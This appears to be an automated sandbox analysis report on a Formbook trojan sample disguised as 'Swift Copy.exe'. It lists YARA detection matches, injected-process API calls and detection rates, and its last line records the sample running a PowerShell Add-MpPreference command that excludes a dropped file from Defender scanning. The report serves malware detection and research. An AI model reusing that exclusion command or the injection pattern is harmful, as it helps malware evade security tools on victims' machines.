          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NETSTAT.EXE PID: 5496, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Swift Copy.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: NETSTAT.EXE PID: 5496, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_02338400
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_02336FF8
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_02337330
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_02338728
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_023384A1
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_0233731E
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_0233736A
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_049CAB90
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_049C0548
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_049C0EF0
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_049C0F00
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_049CAB82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019920A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019928EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019803DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01992B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EAB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019922AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0197FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019925DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01992D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01991D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01991FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01992EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041FB2A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041FBE3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041F3A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 018CB150 appears 75 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019099D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019098A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0190B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0190A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019095F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0190AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0190A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0190A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019096D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01909670 NtQueryInformationProcess,
          Source: Swift Copy.exe, 00000000.00000002.295533138.0000000007180000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs Swift Copy.exe
          Source: Swift Copy.exe, 00000000.00000002.295486432.0000000007030000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs Swift Copy.exe
          Source: Swift Copy.exe, 00000000.00000003.256962954.0000000006ED1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKeysNormalize.dll4 vs Swift Copy.exe
          Source: Swift Copy.exe, 00000000.00000002.295288775.0000000006FD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameKeysNormalize.dll4 vs Swift Copy.exe
          Source: Swift Copy.exe, 00000000.00000002.284608017.00000000023EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs Swift Copy.exe
          Source: Swift Copy.exe, 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs Swift Copy.exe
          Source: Swift Copy.exe, 00000000.00000000.237305228.000000000011A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIHashElementEn.exe. vs Swift Copy.exe
          Source: Swift Copy.exeBinary or memory string: OriginalFilenameIHashElementEn.exe. vs Swift Copy.exe
          Source: Swift Copy.exeVirustotal: Detection: 21%
          Source: Swift Copy.exeReversingLabs: Detection: 19%
          Source: C:\Users\user\Desktop\Swift Copy.exeFile read: C:\Users\user\Desktop\Swift Copy.exeJump to behavior
          Source: Swift Copy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Swift Copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Swift Copy.exe "C:\Users\user\Desktop\Swift Copy.exe"
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
